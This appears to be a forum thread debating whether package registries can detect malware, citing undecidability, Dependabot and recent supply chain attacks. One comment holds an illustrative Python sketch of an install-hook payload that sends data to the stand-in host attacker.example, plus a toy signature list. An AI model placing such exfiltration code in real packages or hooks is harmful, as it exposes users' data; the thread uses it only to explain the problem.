kjok | 5 months ago
This distinction matters. Malware detection is, in the general case, an undecidable problem (think the halting problem and Rice's theorem). No amount of static or dynamic scanning can guarantee catching malicious logic in arbitrary code. At best, scanners detect known signatures, patterns, or anomalies. They cannot prove the absence of malicious behavior.
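The undecidability point follows from the standard reduction, which is easy to sketch. A toy illustration (all names here are hypothetical): wrap any program so that a malicious step executes only after the program finishes, and a perfect detector for the wrapped program would decide the halting problem, which is impossible.

```python
# Toy reduction sketch: a perfect malware detector would decide halting.
# `exfiltrate()` is a hypothetical malicious payload, not a real function.
def make_trap(program_src: str) -> str:
    """Wrap arbitrary source so a malicious step runs iff the source halts."""
    # The payload line is reached only if `program_src` runs to completion,
    # so deciding "does this trap misbehave?" equals deciding "does it halt?".
    return program_src + "\nexfiltrate()  # hypothetical malicious payload\n"
```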
So the reality is: if Google's assurance artifacts stop short of claiming automated malware detection is feasible, it's a stretch for anyone else to suggest registries could achieve it "if they just had more resources." The problem space itself is the blocker, not just a lack of infrastructure or resources.
motorest | 5 months ago
I think this sort of thought process is misguided.
We do see continuous, ecosystem-wide scanning and detection pipelines. For example, GitHub supports Dependabot, which runs supply chain checks.
https://github.com/dependabot
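For reference, a minimal Dependabot setup is a short checked-in config file; a sketch of the documented `.github/dependabot.yml` format (ecosystem and schedule values here are just example choices):

```yaml
# .github/dependabot.yml — ask Dependabot to check npm dependencies weekly
version: 2
updates:
  - package-ecosystem: "npm"
    directory: "/"
    schedule:
      interval: "weekly"
```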
What you don't see is magical rabbits being pulled out of top hats. The industry has decades of experience with anti-malware tools in contexts where malware runs despite never being explicitly granted deployment or execution permissions, and yet it deploys and runs anyway. What do you expect when you make code intentionally installable and deployable, and capable of sending and receiving arbitrary data over HTTP?
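To make the HTTP point concrete, here is a minimal Python sketch of how little it takes for install-time code to phone home using only the standard library (the host and function name are placeholders, not from any real incident):

```python
import urllib.request

# Hypothetical install-hook payload; attacker.example is a placeholder host.
def build_exfil_request(payload: bytes) -> urllib.request.Request:
    # One stdlib call away from sending any data the install script can read.
    return urllib.request.Request("https://attacker.example/collect",
                                  data=payload)
```

Sending it would be a single `urllib.request.urlopen(...)` call; nothing in the packaging model itself distinguishes this from a legitimate telemetry ping.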
Contrary to what you are implying, this is not a simple problem with straightforward solutions. The security model has relied heavily on gatekeepers, on both the producer and consumer sides. However, the latest batch of high-profile supply chain attacks circumvented the only failsafe in place. Beyond that point, you just have a module that runs unspecified code, just like any other module.
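For what it's worth, the "known signatures" fallback mentioned upthread is easy to sketch, and the sketch shows its limit: only byte patterns already on the list get flagged (the signatures below are made up for illustration):

```python
# Hypothetical signature list; a real scanner's list is just much longer.
KNOWN_SIGNATURES = [b"exfiltrate(", b"attacker.example"]

def scan(blob: bytes) -> bool:
    """Flag a blob iff it contains a known-bad byte pattern."""
    # Anything novel, encrypted, or lightly obfuscated sails straight through.
    return any(sig in blob for sig in KNOWN_SIGNATURES)
```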